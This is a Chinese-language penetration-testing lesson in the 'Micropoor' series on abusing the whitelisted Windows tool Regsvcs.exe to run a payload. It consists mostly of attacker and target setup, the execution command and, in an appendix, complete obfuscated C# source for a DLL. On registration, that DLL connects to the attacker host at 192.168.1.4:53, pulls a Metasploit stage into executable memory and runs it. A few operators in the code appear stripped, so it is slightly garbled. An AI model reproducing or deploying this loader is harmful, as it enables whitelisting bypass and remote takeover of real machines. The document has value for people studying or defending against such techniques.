Regsvcs简介:

Regsvcs为.NET服务安装工具,主要提供三类服务:

  • 加载并注册程序集。
  • 生成、注册类型库并将其安装到指定的 COM+ 1.0 应用程序中。
  • 配置以编程方式添加到类的服务。

说明:Regsvcs.exe所在路径没有被系统添加PATH环境变量中,因此,Regsvcs命令无法识别。

具体参考微软官方文档:
https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool

基于白名单Regsvcs.exe配置payload:

Windows 7 默认位置:

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

攻击机:192.168.1.4 Debian
靶机:192.168.1.3 Windows 7

配置攻击机msf:

第七十四课:基于白名单Regsvcs.exe执行payload第四季 - 图1

靶机执行:

  1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Micropoor.dll

第七十四课:基于白名单Regsvcs.exe执行payload第四季 - 图2

附录:Micropoor.cs

注:x86 payload

  1. using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;
  3. namespace phwUqeuTRSqn
  5. {
  7. public class mfBxqerbXgh : ServicedComponent { 
  9. public mfBxqerbXgh() { Console.WriteLine("Micropoor"); } 
  11. [ComRegisterFunction]
  13. public static void RegisterClass ( string DssjWsFMnwwXL )
  15. {
  17. uXsiCEXRzLNkI.BBNSohgZXGCaD();
  19. } 
  21. [ComUnregisterFunction]
  23. public static void UnRegisterClass ( string DssjWsFMnwwXL )
  25. {
  27.  uXsiCEXRzLNkI.BBNSohgZXGCaD();
  29. }
  31. } 
  33. public class uXsiCEXRzLNkI
  35. { [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 pAyHWx, UInt32 KXNJUcPIUymFNbJ, UInt32 MotkftcMAIJRnW);
  37. [DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 yjmmncJHBrUu, UInt32 MYjktCDxYrlTs, UInt32 zyBAwQVBQbi);
  39. [DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 PorEiXBhZkA, byte[] UIkcqF, UInt32 wAXQEPCIVJQQb);
  41. [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 WNvQyYv, UInt32 vePRog, UInt32 Bwxjth, IntPtr ExkSdsTdwD, UInt32 KfNaMFOJVTSxbrR, ref UInt32 QEuyYka);
  43. [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pzymHg, UInt32 lReJrqjtOqvkXk);static byte[] SVMBrK(string MKwSjIxqTxxEO, int jVaXWRxcmw) {
  45. IPEndPoint hqbNYMZQr = new IPEndPoint(IPAddress.Parse(MKwSjIxqTxxEO), jVaXWRxcmw);
  47. Socket LbLgipot = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  49. try { LbLgipot.Connect(hqbNYMZQr); }
  51. catch { return null;}
  53. byte[] VKQsLPgLmVdp = new byte[4];
  55. LbLgipot.Receive(VKQsLPgLmVdp, 4, 0);
  57. int jbQtneZFbvzK = BitConverter.ToInt32(VKQsLPgLmVdp, 0);
  59. byte[] cyDiPLJhiAQbw = new byte[jbQtneZFbvzK + 5];
  61. int vyPloXEDJoylLbj = 0;
  63. while (vyPloXEDJoylLbj < jbQtneZFbvzK)
  65.  { vyPloXEDJoylLbj += LbLgipot.Receive(cyDiPLJhiAQbw, vyPloXEDJoylLbj + 5, (jbQtneZFbvzK  vyPloXEDJoylLbj) < 4096 ? (jbQtneZFbvzK  vyPloXEDJoylLbj) : 4096, 0);}
  67. byte[] MkHUcy = BitConverter.GetBytes((int)LbLgipot.Handle);
  69. Array.Copy(MkHUcy, 0, cyDiPLJhiAQbw, 1, 4); cyDiPLJhiAQbw[0] = 0xBF;
  71. return cyDiPLJhiAQbw;}
  73. static void ZFeAPdN(byte[] hjErkNfmkyBq) {
  75. if (hjErkNfmkyBq != null) {
  77. UInt32 xYfliOUgksPsv = HeapCreate(0x00040000, (UInt32)hjErkNfmkyBq.Length, 0);
  79. UInt32 eSiulXLtqQO = HeapAlloc(xYfliOUgksPsv, 0x00000008, (UInt32)hjErkNfmkyBq.Length);
  81. RtlMoveMemory(eSiulXLtqQO, hjErkNfmkyBq, (UInt32)hjErkNfmkyBq.Length);
  83. UInt32 NByrFgKjVjB = 0;
  85. IntPtr PsIqQCvc = CreateThread(0, 0, eSiulXLtqQO, IntPtr.Zero, 0, ref NByrFgKjVjB);
  87. WaitForSingleObject(PsIqQCvc, 0xFFFFFFFF);}} 
  89. public static void BBNSohgZXGCaD() {
  91. byte[] cyDiPLJhiAQbw = null; cyDiPLJhiAQbw = SVMBrK("192.168.1.4", 53);
  93. ZFeAPdN(cyDiPLJhiAQbw);
  95. } } }

Micropoor